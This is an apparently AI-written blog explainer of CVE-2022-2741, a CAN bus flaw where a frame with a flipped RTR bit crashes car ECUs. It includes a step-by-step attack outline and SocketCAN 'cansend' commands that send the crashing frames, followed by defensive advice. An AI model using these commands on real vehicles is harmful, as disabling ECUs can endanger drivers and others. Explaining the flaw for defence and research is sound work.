The modern car is a rolling computer network, and the Controller Area Network (CAN) bus is the heart of vehicle communications. But sometimes, a tiny misstep in protocol implementation can open a door to big problems. That’s the story behind CVE-2022-2741, a bug that lets an attacker deliberately crash (deny service to) car computers by sending a cunning CAN frame—a threat that proves big hacks don’t always need big tools.

What’s the CAN Bus and Why Does it Matter?

Every time you unlock your door, step on the brake, or the automatic lights come on, modules in your car chat on the CAN bus. This is a shared wire network connecting ECUs (Electronic Control Units). Each frame (message) on the CAN bus is like a little envelope, addressed to specific devices with a CAN ID.

One part of the CAN packet is the RTR bit (Remote Transmission Request), which signals if this frame is a data message or a remote request (like asking for content, not sending it).

What’s CVE-2022-2741 About?

*Summary:*  
A denial-of-service (DoS) problem exists in many embedded CAN drivers (like those in MCUs including some STM32s, as referenced in ST’s advisory). If an attacker sends a message that matches a filter’s CAN ID but flips the expected RTR bit, the target ECU may crash or behave unpredictably.

That’s it. No need for secret access codes, malware, or physical contact—just the right CAN message.

Why Does This Happen?

Most CAN filtering logic checks the message’s CAN ID and, sometimes, the RTR bit. CVE-2022-2741 happens when the node installs a filter with "match only RTR frames" (or only "data frames"). If a frame comes in with the matching ID, but *opposite* RTR bit, some filters get confused and software can crash, leading to a full denial of service. That node may stop working—imagine losing braking or dashboard messages when you need them most.

1. Sniff the CAN bus: Figure out what CAN IDs are used.
2. Guess a filter: Most ECUs install filters for certain IDs (the ones they care about), such as 0x123.
3. Check the expected RTR bit: Using CAN bus analysis tools, you can see if normal traffic is data frames or RTRs.
4. Send the frame: Use a cheap USB-CAN adapter (like CANable), or even tools like socketcan-utils on Linux.

Sample Code: Sending a Malicious CAN Frame with SocketCAN

Let’s say the vulnerable node expects data frames (RTR=0) with CAN ID 0x123. We'll craft a remote request (RTR=1) instead.

```bash
# Install CAN utilities if needed
sudo apt-get install can-utils

# Bring up your CAN interface (adjust for your system)
sudo ip link set can0 up type can bitrate 500000

# Here's the magic: send a remote request frame (RTR) with ID 0x123
cansend can0 123#R
```

If the node expects RTR, do the opposite and send a data frame:

```bash
# Send a data frame (with zero-length data field) to the same ID
cansend can0 123#
```

Can Attackers Do This in Real Life?

Yes:  
- This attack requires physical access to the CAN bus—that means OBD-II ports, exposed diagnostics connectors, or adding an adapter somewhere hard to spot. But some telematics add-ons and insecure Bluetooth or WiFi bridges have exposed cars to bus injection attacks before.
- Once on the network, the needed info is easy to gather—CAN IDs are not secret, and bus traffic is rarely encrypted.

How to Defend Against CVE-2022-2741

- Update ECU firmware: Check for vendor patches (ST’s fix notes mention this).
- Check CAN filters: Make sure both CAN ID and RTR bits are compared correctly, and that unexpected frame types don’t crash your handler.
- Segment your CAN networks: Keep sensitive ECUs isolated from easy-to-reach CAN injection points.
- Monitor for malicious frames: Use IDS tools like CANsec to watch for odd CAN traffic.

References

- CVE-2022-2741 detail page (NVD)
- STMicroelectronics STM32 CAN errata sheet
- CAN bus documentation (Wikipedia)
- CAN tools (can-utils)

Final Words

CVE-2022-2741 shows that even basic “bit flipping” can make embedded systems in cars and machinery fall over. If you work with CAN bus, always check how your node’s filters handle the RTR bit. And if you’re a researcher, this is yet another reminder: sometimes, the simplest hacks still work.

Stay safe—and happy (ethical) hacking!

*Exclusive article by OpenAI’s ChatGPT. Always test responsibly and only on systems you own or are authorized to test!*

Timeline

Published on: 10/31/2022 18:15:00 UTC
Last modified on: 11/01/2022 16:14:00 UTC